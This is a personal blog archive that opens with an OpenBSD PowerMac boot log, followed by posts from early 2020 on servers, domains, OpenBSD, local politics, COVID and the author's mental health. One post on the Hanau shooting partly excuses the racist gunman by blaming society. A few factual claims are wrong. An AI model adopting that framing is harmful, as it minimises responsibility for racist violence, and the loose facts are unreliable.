avail mem = 2020229120 (1926MB)
mpath0 at root
scsibus0 at mpath0: 256 targets
mainbus0 at root: model PowerMac7,3
cpu0 at mainbus0: 970FX (Revision 0x300): 1800 MHz
cpu1 at mainbus0: 970FX (Revision 0x300): 1800 MHz
mem0 at mainbus0
spdmem0 at mem0: 1GB DDR SDRAM non-parity PC3200CL2.5
spdmem1 at mem0: 1GB DDR SDRAM non-parity PC3200CL2.5
spdmem2 at mem0: 1GB DDR SDRAM non-parity PC3200CL2.5
spdmem3 at mem0: 1GB DDR SDRAM non-parity PC3200CL2.5
memc0 at mainbus0: u3 rev 0xb3
kiic0 at memc0 offset 0xf8001000
iic0 at kiic0
lmtemp0 at iic0 addr 0x4a: ds1775
maxtmp0 at iic0 addr 0x4c: max6690
maxtmp1 at iic0 addr 0x4e: max6690
"cy28508" at iic0 addr 0x69 not configured
"cy2213" at iic0 addr 0x65 not configured
fcu0 at iic0 addr 0xaf
"pca9556" at iic0 addr 0x18 not configured
adc0 at iic0 addr 0x2c: ad7417
"24256" at iic0 addr 0x50 not configured
"pca9556" at iic0 addr 0x19 not configured
adc1 at iic0 addr 0x2d: ad7417
"24256" at iic0 addr 0x51 not configured
"dart" at memc0 offset 0xf8033000 not configured
"mpic" at memc0 offset 0xf8040000 not configured
mpcpcibr0 at mainbus0 pci: u3-agp
pci0 at mpcpcibr0 bus 0
pchb0 at pci0 dev 11 function 0 "Apple U3 AGP" rev 0x00
appleagp0 at pchb0
agp0 at appleagp0: aperture at 0x0, size 0x10000000
vgafb0 at pci0 dev 16 function 0 "NVIDIA GeForce FX 5200 Ultra" rev 0xa1
wsdisplay0 at vgafb0 mux 1: console (std, vt100 emulation)
wsdisplay0: screen 1-5 added (std, vt100 emulation)
ht0 at mainbus0: u3-ht, 6 devices
pci1 at ht0 bus 0
hpb0 at pci1 dev 1 function 0 "Apple U3" rev 0x00: 85 sources
pci2 at hpb0 bus 1
macobio0 at pci2 dev 7 function 0 "Apple K2 Macio" rev 0x60
openpic0 at macobio0 offset 0x40000: version 0x4614 feature 770302 LE
macgpio0 at macobio0 offset 0x50
"pmu-interrupt" at macgpio0 offset 0x9 not configured
"programmer-switch" at macgpio0 offset 0x11 not configured
"modem-reset" at macgpio0 offset 0x1d not configured
"modem-power" at macgpio0 offset 0x1e not configured
"fcu-interrupt" at macgpio0 offset 0x15 not configured
"fcu-hw-reset" at macgpio0 offset 0x3a not configured
"slewing-done" at macgpio0 offset 0x23 not configured
"codec-input-data-mux" at macgpio0 offset 0xb not configured
"line-input-detect" at macgpio0 offset 0xc not configured
"codec-error-irq" at macgpio0 offset 0xd not configured
"dig-hw-reset" at macgpio0 offset 0x14 not configured
"line-output-detect" at macgpio0 offset 0x16 not configured
"headphone-detect" at macgpio0 offset 0x17 not configured
"codec-irq" at macgpio0 offset 0x18 not configured
"headphone-mute" at macgpio0 offset 0x1f not configured
"amp-mute" at macgpio0 offset 0x20 not configured
"hw-reset" at macgpio0 offset 0x24 not configured
"line-output-mute" at macgpio0 offset 0x25 not configured
"codec-clock-mux" at macgpio0 offset 0x26 not configured
"escc-legacy" at macobio0 offset 0x12000 not configured
zs0 at macobio0 offset 0x13000: irq 22,23
zstty0 at zs0 channel 0
zstty1 at zs0 channel 1
kiic1 at macobio0 offset 0x18000
iic1 at kiic1
aoa0 at macobio0 offset 0x10000: irq 30,1,2
"timer" at macobio0 offset 0x15000 not configured
adb0 at macobio0 offset 0x16000
apm0 at adb0: battery flags 0x9, 0% charged
piic0 at adb0
iic2 at piic0
"fans" at macobio0 offset 0x4c not configured
audio0 at aoa0
ohci0 at pci2 dev 8 function 0 "Apple K2 USB" rev 0x00: irq 27, version 1.0, legacy support
ohci1 at pci2 dev 9 function 0 "Apple K2 USB" rev 0x00: irq 28, version 1.0, legacy support
usb0 at ohci0: USB revision 1.0
uhub0 at usb0 configuration 1 interface 0 "Apple OHCI root hub" rev 1.00/1.00 addr 1
usb1 at ohci1: USB revision 1.0
uhub1 at usb1 configuration 1 interface 0 "Apple OHCI root hub" rev 1.00/1.00 addr 1
ppb0 at pci1 dev 2 function 0 "Apple U3" rev 0x00
pci3 at ppb0 bus 5
bwi0 at pci3 dev 1 function 0 "Broadcom BCM4306" rev 0x03: irq 57, address 00:11:24:9c:01:82
ppb1 at pci3 dev 2 function 0 "Pericom PI7C9X111SL PCI" rev 0x02: irq 52
pci4 at ppb1 bus 6
xhci0 at pci4 dev 0 function 0 "Renesas uPD720202 xHCI" rev 0x02: irq 52, xHCI 1.0
usb2 at xhci0: USB revision 3.0
uhub2 at usb2 configuration 1 interface 0 "Renesas xHCI root hub" rev 3.00/1.00 addr 1
ohci2 at pci3 dev 3 function 0 "NEC USB" rev 0x44: irq 53, version 1.0
ehci0 at pci3 dev 3 function 1 "NEC USB" rev 0x05: irq 53
usb3 at ehci0: USB revision 2.0
uhub3 at usb3 configuration 1 interface 0 "NEC EHCI root hub" rev 2.00/1.00 addr 1
ppb2 at pci3 dev 4 function 0 "Pericom PI7C21P100 PCIX-PCIX" rev 0x01
pci5 at ppb2 bus 7
em0 at pci5 dev 4 function 0 "Intel 82546GB" rev 0x03: irq 54, address 90:e2:ba:25:47:cc
em1 at pci5 dev 4 function 1 "Intel 82546GB" rev 0x03: irq 54, address 90:e2:ba:25:47:cd
em2 at pci5 dev 6 function 0 "Intel 82546GB" rev 0x03: irq 54, address 90:e2:ba:25:47:ce
em3 at pci5 dev 6 function 1 "Intel 82546GB" rev 0x03: irq 54, address 90:e2:ba:25:47:cf
ohci3 at pci3 dev 11 function 0 "NEC USB" rev 0x43: irq 63, version 1.0
ohci4 at pci3 dev 11 function 1 "NEC USB" rev 0x43: irq 63, version 1.0
ehci1 at pci3 dev 11 function 2 "NEC USB" rev 0x04: irq 63
usb4 at ehci1: USB revision 2.0
uhub4 at usb4 configuration 1 interface 0 "NEC EHCI root hub" rev 2.00/1.00 addr 1
usb5 at ohci2: USB revision 1.0
uhub5 at usb5 configuration 1 interface 0 "NEC OHCI root hub" rev 1.00/1.00 addr 1
usb6 at ohci3: USB revision 1.0
uhub6 at usb6 configuration 1 interface 0 "NEC OHCI root hub" rev 1.00/1.00 addr 1
usb7 at ohci4: USB revision 1.0
uhub7 at usb7 configuration 1 interface 0 "NEC OHCI root hub" rev 1.00/1.00 addr 1
ppb3 at pci1 dev 3 function 0 "Apple U3" rev 0x00
pci6 at ppb3 bus 2
kauaiata0 at pci6 dev 13 function 0 "Apple K2 ATA" rev 0x00
wdc0 at kauaiata0 irq 39: DMA
atapiscsi0 at wdc0 channel 0 drive 0
scsibus1 at atapiscsi0: 2 targets
cd0 at scsibus1 targ 0 lun 0: removable
cd0(wdc0:0:0): using PIO mode 4, DMA mode 2, Ultra-DMA mode 4
"Apple K2 Firewire" rev 0x00 at pci6 dev 14 function 0 not configured
ppb4 at pci1 dev 4 function 0 "Apple U3" rev 0x00
pci7 at ppb4 bus 3
gem0 at pci7 dev 15 function 0 "Apple K2 GMAC" rev 0x00: irq 41, address 00:0d:93:4e:ab:48
brgphy0 at gem0 phy 1: BCM54K2 10/100/1000baseT PHY, rev. 0
ppb5 at pci1 dev 5 function 0 "Apple U3" rev 0x00
pci8 at ppb5 bus 4
pciide0 at pci8 dev 12 function 0 "ServerWorks K2 SATA" rev 0x00: DMA
pciide0: using irq 0 for native-PCI interrupt
pciide0: port 0: 1.5Gb/s
wd0 at pciide0 channel 0 drive 0:
wd0: 16-sector PIO, LBA48, 305245MB, 625142448 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 6
pciide0: port 1: 1.5Gb/s
wd1 at pciide0 channel 1 drive 0:
wd1: 16-sector PIO, LBA48, 76319MB, 156301488 sectors
wd1(pciide0:1:0): using PIO mode 4, Ultra-DMA mode 6
pciide0: port 2: PHY offline
pciide0: port 3: PHY offline
uhub8 at uhub2 port 2 configuration 1 interface 0 "Asmedia ASM107x" rev 3.00/1.00 addr 2
umass0 at uhub8 port 4 configuration 1 interface 0 "JetFlash Mass Storage Device" rev 3.20/11.00 addr 3
umass0: using SCSI over Bulk-Only
scsibus2 at umass0: 2 targets, initiator 0
sd0 at scsibus2 targ 1 lun 0: removable serial.85641000G9DFAXBRA6US
sd0: 7208MB, 512 bytes/sector, 14761984 sectors
uhub9 at uhub2 port 4 configuration 1 interface 0 "Asmedia ASM107x" rev 2.10/1.00 addr 4
uhub10 at uhub5 port 3 configuration 1 interface 0 "Macally Macally iKey" rev 1.10/0.01 addr 2
uhidev0 at uhub10 port 1 configuration 1 interface 0 "Macally Macally iKey" rev 1.10/0.01 addr 3
uhidev0: iclass 3/1
ukbd0 at uhidev0: 8 variable keys, 6 key codes
wskbd0 at ukbd0: console keyboard, using wsdisplay0
uhidev1 at uhub0 port 1 configuration 1 interface 0 "Apple Computer HID-proxy" rev 1.10/12.41 addr 2
uhidev1: iclass 3/1
ukbd1 at uhidev1: 8 variable keys, 6 key codes
wskbd1 at ukbd1 mux 1
wskbd1: connecting to wsdisplay0
uhidev2 at uhub0 port 1 configuration 1 interface 1 "Apple Computer HID-proxy" rev 1.10/12.41 addr 2
uhidev2: iclass 3/1
ums0 at uhidev2: 5 buttons
wsmouse0 at ums0 mux 0
vscsi0 at root
scsibus3 at vscsi0: 256 targets
softraid0 at root
scsibus4 at softraid0: 256 targets
bootpath: /ht/pci@5/k2-sata-root/k2-sata@1/disk@0:/bsd
root device (default wd0a): wd1a
swap device (default wd1b):
root on wd1a swap on wd1b dump on wd1b
WARNING: / was not properly unmounted
So I hope the formatting turns out alright or I'll have to re-edit this post.
6 months of Bare-metal
January 19th, 2020
On May 22, 2019 I decided to switch to bare-metal servers. Here is the first
report how it went. The servers obviously cost more, but I'm feeling a lot
more secure being on an airgapped server from others. I had rented 2 dedicated
servers from hetzner online (which is a local provider), and one was exchanged
by now. I think it was for the better since they gave me hardware that
allowed vm's. I am currently running a vm on each of those servers and it's
routed to via an IPv6 /56 that I had to purchase for 50 EUR. That was worth
it too. I still want to do a lot more things with this /56, just haven't
gotten around to it. Who really needs IPv4 anyhow. I probably have a higher
economic impact on the environment, so here is my plea. Please make bare-metal
servers more energy efficient. We need cheap, and good servers that are very
energy efficient as cloud computers seem to always have problems. From
Spectre attack to Zombieload (which caused me to go bare metal) and beyond,
cloud computers are really a PITA administratively thinking. I have another
3.5 years to go on these, the I'll have to look around what I want to do for
my online presence.
Working on an OpenBSD GTK+ access point selection tool
January 19th, 2020
I've been working on this since friday. It is my second GTK+ project ever.
The program uses ioctl to parse out the Access Points on wifi interfaces,
and eventually you'll be able to select one and use a password with it. It
will make OpenBSD lazy and cozy. I know one person in the world who'd have
something against it, but what else is new eh? It's just a personal project
but I'm likely gonna share the code when it's finished.
Exactly 18 years to january 19, 2038
January 19th, 2020
Dang.
Electricity for 2019
January 20th, 2020
Year
Night
Day
Total
2013
6941
1276
8217
2014
6906
1323
8229
2015
10151
1452
11603
2016
9643
1420
11063
2017
9788
1485
11273
2018
8546
1655
10201
2019
9064
1412
10476
total
61039
10023
71062
average
8720
1432
10152
Electricity is up in total by 275 KWh, I have to backpay 226.70 EUR because
electricity prices went up. I also have to pay a higher monthly rate of
roughly 20 EUR more. The number 2 stands out here. To me this is bad news.
Registered mainswitch.de
January 20th, 2020
I have registered this domain today and renewed mainrechner.de for another
2 years. All the domains that i have that expire in 2022 I will keep.
The new domain points to mainswitch.de
and goldflipper.mainswitch.de
which takes over for goldflipper.de which expires in april or so. Another
domain of mine, solarscale.de, will expire in 12 days. So it's just a shuffle
of names and padding out as I'm losing some domain space in the next 3 months.
What's on my mind? M&M's
January 23rd, 2020
An M&M is a type of candy in the form of a pill. It's core is made of dark
chocolate. I remember there was a lack of blue M&M's when I was a kid, but
I may have it wrong in memory. Think of it as Red Pill vs. Blue Pill.
Another idea I get about "MM" is malade mental, crazyness, mental illness.
I'm sure though you won't get crazy eating only M&M's. Another sweet thought
I have though about M&M's. In summer when it's real hot, you can crush M&M's
up and serve them over vanilla ice cream. Dairy Queen which is an outlet
of icecream products used to offer this and call it a "Blizzard" (at least in
Canada). Perhaps if you eat blizzards in the summer it will storm in winter?
Try it out next summer. And see next winter.
Cooling Venus
January 26th, 2020
I drew this up how I think venus is cooled best with solar sails which are
in an elliptic orbit around venus. The sails have several modes, one
particular mode is when the sail gives shade but the pressure of the sun is
on it, making this orbit far enough (Past L1) means that the gravity of the
sun could help the sail make it. After the orbit is at it's maximum point
where it gives the maximum shade on venus, it will get a boost by sun
particles on its way back toward the white planet.
The other modes are a nightglider mode where the sail may be turned away from
the sun giving it maximum speed (if there is any atmospheric resitance).
Another mode following this is a solar charging mode where solar panels are
powering ion thrusters to pick up speed. In this mode the sail is still in
nightglider mode.
The sails come from the planet mercury where they are manufactured in craters
around the poles which have eternal darkness. They are 100% intact and are
actually sailed to Venus in one piece. This is why humanity must learn how
to manufacture on the moon which is similar to mercury. Mars' gravity is the
same on Mercury so we'll see if humans can live on this terrain.
10 Year Anniversary Photos (of Orion)
January 28th, 2020
In 2010 on February 7th I took this photo:
I'm gonna try to get the 10 year anniversary photo of this. but it'll prove
hard because the moon will be near full in Gemini. Will try the best I can
I'm charging the batteries of the same camera that I inherited about 5 years
ago. I'm looking forward to seeing Beetlegeuse being dimmer, and hopefully
it'll be the last photo of it before it goes Supernova or dims completely.
We'll see. Another (better) opportunity will be around the 16th of Feb.
For Centroid's sake
January 31st, 2020
As you know I have the domain name "centroid.eu" I registered this over ten
years ago not knowing that I lived close to the centroid of the EU. Before
the map that I'll show you the Centroid of the EU was near Aschaffenburg
in Lower Franconia. With Brexit the centroid moved eastwards to Gadheim
which is about 40 minutes from here by car.
Map is courtesy of Google. As you can see I live very close to the Centroid
of the EU. I'm glad that centroid.eu is so close (in the same municipality
lower franconia). I didn't chose centroid.eu because of this geographic
location but because of the centroid of knowledge and the centroid that
interested me determining GPS coordinates. I'm very happy with this domain
name and have been asked to give it up once already. There is a high price
(around 80K euros) for me to give it up. But I won't give it up even if
someone offers that much money. To much is intertwined in my life and my
Internet presence to this.
SolarScale.DE expires tomorrow
January 31st, 2020
A long time domain of mine, solarscale.de expires tomorrow. I didn't want
to keep paying for it. Thank goodness for the lesser spam I'll be getting.
I had it almost as long as I had the domain centroid.eu. I always imagined
it as a sort of coat with scales that are solar cells that produce
electricity. There is a market for scales that are powered by solar cells
which can grab that domain now. I don't care much who takes it as long as
they respect my privacy as the previous domain holder. This means bouncing
or discarding emails that may get to them in error. Goodbye solarscale.de.
Goodbye UK
January 31st, 2020
You introduced a new term in language "brexiting - the act of saying goodbye
and then hanging around" :-). Now it's for good though I already
said goodbye once.
New opportunities await you UK. You'll see. And maybe you'll want a union
with Canada or someone. Megxit may make it possible as a liason. Although
I don't know if Harry would like to see Canada and UK bonding. Whatever the
future holds, I hope it will be brilliant.
Working on a new side-project
February 7th, 2020
It's a mixer program for my Numark DJ mixer. The source is
here.
I posted some of this source to openbsd-misc a few days ago but it wasn't
working then. At least you can select songs now and play them, but it doesn't
mix yet. Not sure how I'll do that.
Nearing end of winter (2 weeks left?)
February 15th, 2020
The birds are already starting to build nests. Maybe I'll get a photo of one
near my apartment. In beginning of march things will turn around here I
believe and spring will be oncoming.
Opinion: Germany should not invest in classical Supercomputers
February 16th, 2020
I was just reading about a new Supercomputer
in Berlin and Goettingen. And I'm wondering, who pays for the electricity of
these 100,000's of cores? In germany when you're a high-wattage user of
electricity it costs 15 cents per KWh (so 1/2 price and is subsidized by
other consumers, who pay 30 cents per KWh), so do some estimates.. even then
the electricity bill is going to be huge. Not to mention they use a coal
powered generation plant to produce the electricity. Sorry there has to be
a better way! But fear not! There is a solution, when there is need, there
is innovation they say! If you invest in photonics research you can cut the
powerbill on a truly photonic supercomputer and it should be 1000x faster and
require less power. Further more a quantum computer is a nice thing to have
it probably only uses electricity en-masse for the cooling and then is fairly
fast. Use that until you figure out the photonics! What has happened to the
german erfindergeist?
Regarding OpenBSD donations
February 17th, 2020
OpenBSD
has released a statement that they took in roughly $692,000 CAD in last
years donation campaign. I'm proud to mention that I contributed 1/500 of that
and at least 1/70's of that for a private donor when counting that private
donors contributed up to $100,000 CAD. I have already made up my mind how much
I will donate this year and it will be around 50 EUR possibly donating it next
month. This is a far cry from yesteryear but I'm poor and last year I had the
money and this is what gives me joy.
I hope OpenBSD won't squander their money, but uses it to the best interest of
the project. Perhaps hire half a dozen people for a year. These have to be
the best and perhaps already OpenBSD developers that can take a sabbatical
from their current job. If it means moving to Alberta I don't know if that'll
work, but it would be an adventure for those elegible. Good luck to OpenBSD!
This webserver has now powersavings
February 17th, 2020
Good for the environment, I have switched on powersavings mode on this
webserver. I had previously thought it was already turned on but it wasn't.
The mail server has it turned on so maybe I mistook them. When the system
idles it will do so at 1600 MHz and at high load it will adjust higher.
It is the apmd -A mode if you know this. I also use this at home on my
workstation. It also means more profit for my hoster, but ultimately the
environment wins.
SLRN probably has a bad RNG
February 18th, 2020
Yesterday I was looking through the source of slrn (not released since 2014?)
and found this:
This is an incredibly stupid fast random as it's not cryptographic. But I
analyzed this second number and it looked like a timestamp. It was to the
day 18 years ago when this timestamp was (more than luck for me?). I googled
but could only find someone named Kaminski dying on that day of old age.
Perhaps it has a different meaning.
The reason I looked at slrn is because I'm considering perhaps writing a simple
NNTP server with security in mind. But slrn won't even work on it becuase it
will be using TLS1.2 and possibly 1.3. So that's a dillema. Once the NNTP
server would be done I would have used it for comments in this blog.
Free Julian Assange
February 18th, 2020
And please no extradition to the USA for Julian Assange. If it wasn't for
wikileaks, we'd never know about the "collateral murder" video where innocent
men, women and children were killed by an apache gunship helicopter in bagdad.
We'd also know less of other leaks that were important. Hasn't Julian suffered
enough? Hasn't he made enough mistakes and paid a dear price already? If he
was released today he'd still not be the same person he was 8 years ago.
Many prominent personas have already called for him to be released. I'm not
prominent but I add my voice. Give Julian a ride home to Australia.
Another batch of starlink sats launched
February 18th, 2020
Yesterday a rocket from SpaceX put another 60 satellites in orbit, upping the
total launched to around 300. It is much bigger than iridium already.
Iridium was a 77 satellite constellation put up by motorola in the 90's for
satellite phone communications. I have thought about this starlink a lot
and I think the price for access to this network should be either based on
income, or GDP of a country, with optionally a fixed price for high income
persons ie. 19.95 USD/mo or something. There is 3 billion+ people on earth that
don't have Internet access and a majority of those are people who live on a
few dollars a day. They should be given access that is affordable. So
starlink could be making 3 billion dollars a month for all those 3 billion
people paying 1 dollar a month. That's incredible profit as it costs 10 billion
(my estimate) to put 40,000 starlink satellites up. That money would be
recovered within the first year of operation. When it's available I'd like
to partake in using spacex's starlink. It is skynet.
Now on to the astronomers who are going to get worse and worse starshots. I
believe there should be a programme to put a few hubbles up to compensate them.
And they already have a company that can do this for them. At reduced pricing.
Noone has to lose their job here, although the value to humanity getting
everyone access to the Internet outweighs astronomers hunting for planets in
other star systems. Don't you think?
Happy Two-day
February 20th, 2020
Today is 20200220, that's rare.
Happy Between Two-days
February 21st, 2020
Yesterday was 202002020, tomorrow will be 20200222, both two-days. Then
no two-day's until 2022! And after 2022 not until 2200!
The give and the take
February 21th, 2020
Clearly it's evident that somewhere in some city someone went too far. I'm
talking about the gunman in Hanau. Was he really racist? Or did he admire
someone of colour? Was he really having sexual problems? Or was he just
like anyone in society that didn't get married at an early age. I blame
not just this subgroup "The racists" in society for this persons actions.
I blame the entire society. It failed this dude. It failed to protect him
from extremist actions. The entire blame cannot be put on him. And I don't
have angst on english speakers, I don't have right-wing ideologies, and I
don't have the need to go shoot up a Shishkebob place.
When I lived in Frankfurt a very strange event happened to me. I tried to high
five a stranger, because I was feeling great. He thought I was coming after
him and called the cops who then detained me and fingerprinted me and took my
DNA. I'm sure I was put into some book by them, but it was all a
misunderstanding. This is when society is paranoid I concluded. The hate
lies within the system and it needs to change. With regards to buddy who
then killed 9 strangers, his mother and himself he was a product of this
environment, so much I'm sure. And yes he was a weak one, who didn't have
better judgement over his actions. 'Nuff said.
Happy Two-day too
February 22nd, 2020
:-) A happy two day to you too!
Over seven years in my current apartment
February 23rd, 2020
In February 2013 I moved into my current apartment, this is just slightly longer
than the longest stays I had in my lifetime 1. seven years at Rossbrunn Str. in
Schweinfurt 1980-1987, and 2. Living in Stratford, ON 1987-1994. All other
times I lived in different apartments in Darmstadt, Toronto, Brampton, Barrie,
Montreal, Frankfurt and Schweinfurt. Time seems to go by faster with age.
Schweinfurt goes to the polls on March 15, 2020
February 26th, 2020
There is really only one party to vote for, "Die Gruenen". Also Holger
Laschka (Die Gruenen) is coming back to Schweinfurt and is a Mayor candidate.
I'm going to vote for him. He owned a PC store in Schweinfurt once and I once
bought a PC there. I remember him making commentary that a Core i7 is
perhaps not that good for the environment but he fulfilled my order back
then. He left Schweinfurt for a bit for Munich region because it's
impossible to find a job here, I know exactly how that feels. But he
was born here and was a long time Schweinfurter. Looking forward to him
replacing Mayor Remele.
Donated 5 EUR to OpenSMTPD
February 26th, 2020
It's a small gesture to tell them I back them, and to pay Gilles a little
something for being such a great ML administrator. OpenSMTPD hasn't had it
easy the last few months with vulnerabilities coming out at a higher frequency.
It just goes to show, software development isn't a breethe, it's damn hard to
get things secure. They say for every 400 lines of C code there is a bug, I
hope that's not true for my own software, but it could indeed be.
Do I believe in God?
February 27th, 2020
I've been through phases where I acknowledged god, and I've been through
phases where I denied god. I'm not gonna lie about this. I've never
verbally outed acknowledgement of god except when I had my psychosis, as
what I saw was beyond what I could fathom this world could become. I mean
how do you explain hallucinations? If it's an overwhelming experience
then it must be done with godly powers. We all want god to be in favour of us,
but what if god is not in favour of our ideal world image? When I was in
a hallucinatory state I was able to function, but it was becoming irritating
to always have delusions around what I saw. Eventually I got medical care.
I'm receiving this to this day. Does god like me? Do I like god still?
The answer lies deep within me, but it's nobodies business to know what I
believe. It's me that has to know. I do know that the universe is big,
very big. And there is lifeforms on earth that have any shape and colour. It's
gods will to be any of those is my believe, or if god so choses he can be all
at once. It's not needed for "an expert" to tell me I'm right or wrong. This
goes beyond experts. Experts are just professions that are attained like a
wolf puts on a sheeps clothing. But truly godlyness so highly cannot have an
intermediator, it comes in its pure direct form. Everyone says a psychosis
is a negative experience, I say no. It is an experience that is overwhelming
but it is not negative. When exposed to overwhelming events the human mind
has a tendency to frustrate. Frustration is a negative experience because we
have to admit that we're just little. Now I'd like to end this, I'd like to
point to statements that say that people who are naturally born blind do not
get psychosis. Things that make you go think, and wonder.
Why is there so many jackass-employers?
February 27th, 2020
I do believe employers should be judged just like Harvey Weinstein was.
There is a list of criteria I can assemble to judge them with.
I'm against NATO involvement in Syria
February 28th, 2020
When Turkish troops get hit, it's on Erdogan, it's his war. NATO should not
get involved here. Sorry. I'm trying to prevent a ww3 scenario here. I've
said it all along NATO out of Afghanistan, out of Africa and out of any other
place outside of our borders.
I don't think much about BSD Certifications
March 1st, 2020
Recently I read about someone wanting to do BSD certifications. Why do so?
I don't know for me personally I've been doing enough open source for 20+
years that I don't need these entry level examinations. 95% of the stuff
they cover I already know. There may be a small incompatibility on these
but let's have a run down, I've been doing:
Linux, since 1995
FreeBSD, since 1996
OpenBSD, since 1998
Open Source project with over 1000 lines of C code since 2005
minor Kernel work here and there, so what if deraadt doesn't like it
reported countless bugs without providing patch, some of them quite complex in nature
What I'm trying to point out here is that 160 EUR for a BSD certification is
just repeating the pattern that I've always been doing. This pattern I'll
describe to you. When I was in grade 9 I joined the Junior Basketball team.
In grade 10 the Midget Basketball team joined me at the Junior level, and I
in turn became a benchwarmer. So go ahead, keep a warm bench for me in BSD
too. I'm not complaining, just saying, yeah I'm sorta sick of it. Sending
me back to 'the basics' for a friggen certification isn't helping me, it's
hindering me. So I don't have great feelings about this. So yeah blame it
on my cranky mood this week, blame it on god, blame it on the other guy.
I'm being stinky. And everything was fine until certfications came along and
"tried to raise the corporate standard of BSD usage". Gee, thanks!
This blog is now censored
March 1st, 2020
Due to coarse language, the rating of this blog has gone up to "Parental Guidance". Thanks.
Donation time
March 2nd, 2020
I have donated 50 EUR to OpenBSD. Likely the last of the year. Perhaps if
I get employment this year I can continue donating more.
Earth has a second moon, until April...
March 3rd, 2020
2020 CD3 has been
discovered in February 2020. This tiny moon is called a "captured" moon
and it will be ejected in april some time they think. Anyhow enjoy the
news.
DNSSEC: I just re-signed the zones
March 3rd, 2020
Since I created a delphinusdnsd blog you'll likely see less DNS related
topics on this blog. I want to, however, make you aware of a re-signing
of a a zone I just did. I blogged about it on the delphinusdns.org blog.
Go here to read it.
Important is the 2nd last paragraph that gives some rationale why I didn't
sign a zone at work once (between 2010 and 2018). It's a careful weighing of
options one must do in those situations.
Formal apology to a stranger
March 3rd, 2020
As I write this to "Take a walk in my shoes" by Exco Levi, I would like to
offer my apology to a stranger that I told to "get a job" roughly 20 years
ago. He had riled around me riding my bike on the sidewalk in Parkdale in
Toronto (near intersection of King Street and Dufferin). It was very
impolite for me to do this, and the countless of years of not having a job
(looking at 10 years total since Y2K now) allowed me enough time to walk in
this guys shoes if he really was unemployed. He actually chased me and I
never pedalled my bike so hard than this time to escape him. Well...here's a sorry to all
those that don't have a job or career, I know it sucks. I really dislike
that word "job" because it always sounds so temporary. Go on bud, I hope
you have some closure of this pain if you read this.
Why Schweinfurt does not need a Landesgartenschau
March 3rd, 2020
Landesgartenschau is something like a Country Garden Fair (roughly translated)
that I think is comparable to the Olympics for big cities/countries. It will
put us in debt and the money coming in will not displace the money going out.
Yes it may succeed in making us pretty, it may offer some architecture that
facilitates hoardes of people. I don't think we need this though. We need
affordable apartments above all else, because we have a giant problem with
growing poverty. Digitalization will decimate more jobs. Schweinfurt in
the past has always profited off emigration sending problems to other cities
because they are the facilitators of jobs. If we didn't have so much
emigration we'd be a city of population 100K by now. You can totally tell
this from the population chart on wikipedia. Landesgartenschau counts on
you and me leaving the city and not make it our home. Let's see I guess
living here over 20 years (1980-1987, 2002-2005, 2007-2020) doesn't mean
anything. I guess it's up to you. I won't vote Remele for Mayor in 2 weeks.
SchweinfurtDating.DE to expire in a month
March 4th, 2020
I had it a few years. It didn't come to a date. But people looked. It will
expire after April 3rd, 2020.
Corona Virus
March 5th, 2020
If you live in Germany and speak german there is some important information
to be found here (mainpost.de) regarding the
corona virus. One thing I didn't know that if you do get an infection and
symptoms to not ever go to the hospital. Call your physician or the public
health office and they will give you instructions on what to do.
Also in preparation to the 60-70% of people who will get corona-virus according
to the article, I have made some things available for me, skype for example.
Face to face is probably not wise while the virus is spreading. I'm in contact
with my physicians to see if I can get a skype review and my recipes mailed to
me. I will not show up to sit in a full waiting room with people, that's un-
wise.
How am I feeling? I've had a dry cough here and there.. maybe with a period
of 30 minutes per cough. That's nothing, could be anything, I'm not going to
get hung up over that. But it's good to make preparations despite. If anyone
in my neighbourhood needs Wifi I can provide that, but it will take a bit to
unpack the routers which I was gonna throw out, and reactivate them.
A gift for jrmu and PiRATA
March 5th, 2020
I have made two presents available for two people on IRC. One is for PiRATA
who lives in Portugal and has already received it. Another is for jrmu who
had a list of things he'd like to see fixed in OpenBSD and in order to be
pro-active I have sent him a book to Taiwan. One is a donation and the other
is a gift (PiRATA's because he made the OpenBSD delphinusdnsd port) both
presents were given out in the month of February. And the presents are
identical: The ANSI C Programming Language by Brian Kernighan and Dennis
Ritchie, also known as K&R. I hope these two people will be able to become
good C programmers and help with their ambitions. This is likely the last
of presents I'm giving out this year. Very soon is my birthday, so I hope
to receive something from my parents.
City of Schweinfurt fells 80 year old tree
March 06th, 2020
The city fell a tree at the Spitalseebunker, it was highly controversial.
The city doesn't have all too many trees left and they keep on taking down
more. Time for a regime change. I won't be voting for mayor Remele but
instead will be voting Holger Laschka for mayor. Because he is with the
Greens perhaps they would have approached the felling of the tree a little
different.
For the sake of Democracy
March 6th, 2020
The polls at the Bavarian wide city elections are open. In times of a virus
outbreak they're risking a large population movement in voter cabins. I don't
know if that's good. I do know that electronic voting is bad. So what to do?
It's one dillemma that needs to be solved in the future. Computers need to
be made secure so that people can vote from home. That's my understanding
and it probably won't be solved in my lifetime. Anyone promising computer
security by means of software needs to be examined. Computers need a strong
security model before we can consider electronic voting.
Demo for Pension security cancelled
March 6th, 2020
The VdK which is an organization that represents the old and socially weak
among other things, of which I'm a member of, has cancelled it's demo in
Munich that was supposed to be held on March 28th. The motto for the protest
was "pensions for all". Basically what happened is that the CDU government
under Helmut Kohl, in the 1990's plundered the pension fund for reunification
purposes. So it is on the younger generation to provide pension money to the
old (who may or may not have worked all their lives). There is not enough
money to go around to pay for all of this, and people have to go on welfare
to live. So we have a problem.
For one there is not enough jobs to go around
to help fill the pension fund (as I'm directly seeing), and two there is no
system to take pension money from people working from home as self-employees.
This is called "Freiberuflich Angestellte", I did this for 8 years and was
able at the time to pay into a pension fund. I decided to keep the money in
my bank account and when I became unemployed again, I was told to use up this
money first before I can get welfare. This is how it goes and there is no
money to go around for the seniors. What we need is a tax for pensions, and
the tax should be put on the rich and employed no matter what employment type.
It should be taken from the revenue service office directly instead of through
a service from pensions. That's my idea of this, and yes, unfortunately
because I worked so little i will perhaps get a pension of 200 EUR by todays
record. That's not enough to live and I'll end up on welfare as a pensioner.
Big problems!
Spring is not yet in the air
March 6th, 2020
On February 15th
I blogged that we're nearing the end of winter. I was wrong in my
prediction. We've had a pretty warm winter throughout and there is a lot
of rain coming through low pressure systems keeping the temperatures low.
Spring with its beauty and smells is not quite here yet. The tree beside
my office window is building buds though and when Spring is here it will
shoot into blossoms. Maybe another week. In ten days is my birthday. I'm
looking forward to it. I am turning 44 years old. BTW we had the warmest
winter on
record with an average of 3.4C above the 1981-2010 norm. There is no
denial that global warming is happening. I dislike the language the quoted
BBC article used though, the words downplay the significance that this is
the hottest winter on record!
I'm not a screw-up, but why do I feel like it?
March 8th, 2020
When I look at my Resume/CV I am not a screwup. I've been fired three times
